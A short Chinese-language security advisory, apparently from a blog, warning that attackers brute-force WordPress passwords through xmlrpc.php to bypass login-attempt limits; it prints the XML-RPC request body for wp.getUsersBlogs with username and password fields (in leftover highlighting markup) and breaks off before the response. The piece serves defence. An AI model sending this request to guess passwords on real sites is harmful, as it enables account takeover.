利用xmlrpc.php对WordPress进行暴力破解攻击

近几天wordpress社区的小伙伴们反映遭到了利用xmlrpc.php进行暴力破解的攻击。利用xmlrpc.php提供的接口尝试猜解用户的密码，可以绕过wordpress对暴力破解的限制。已经发现了大规模的利用，启用了xmlrpc的同学需要尽快修复。安装或者升级Login Security Solutin插件

通常wordpress登录接口都是做了防暴力破解防护的，比如freebuf的登录只能有尝试5次。

这种利用xmlrpc.php的攻击可以绕过这些限制。攻击的方式直接POST以下数据到xmlrpc.php.

<span class="pun"><?</span><span class="pln">xml version</span><span class="pun">=</span><span class="str">"1.0"</span><span class="pln"> encoding</span><span class="pun">=</span><span class="str">"iso-8859-1"</span><span class="pun">?></span>
<span class="pun"><</span><span class="pln">methodCall</span><span class="pun">></span><span class="pln">
  </span><span class="pun"><</span><span class="pln">methodName</span><span class="pun">></span><span class="pln">wp</span><span class="pun">.</span><span class="pln">getUsersBlogs</span><span class="pun"></</span><span class="pln">methodName</span><span class="pun">></span><span class="pln">
  </span><span class="pun"><</span><span class="pln">params</span><span class="pun">></span><span class="pln">
   </span><span class="pun"><</span><span class="pln">param</span><span class="pun">><</span><span class="pln">value</span><span class="pun">></span><span class="pln">username</span><span class="pun"></</span><span class="pln">value</span><span class="pun">></</span><span class="pln">param</span><span class="pun">></span><span class="pln">
   </span><span class="pun"><</span><span class="pln">param</span><span class="pun">><</span><span class="pln">value</span><span class="pun">></span><span class="pln">password</span><span class="pun"></</span><span class="pln">value</span><span class="pun">></</span><span class="pln">param</span><span class="pun">></span><span class="pln">
  </span><span class="pun"></</span><span class="pln">params</span><span class="pun">></span>
<span class="pun"></</span><span class="pln">methodCall</span><span class="pun">></span>

其中username字段是预先收集的用户名。password是尝试的密码。关于getUsersBlogs接口的更多信息可以参考官方的指南。如果密码正确，返回为：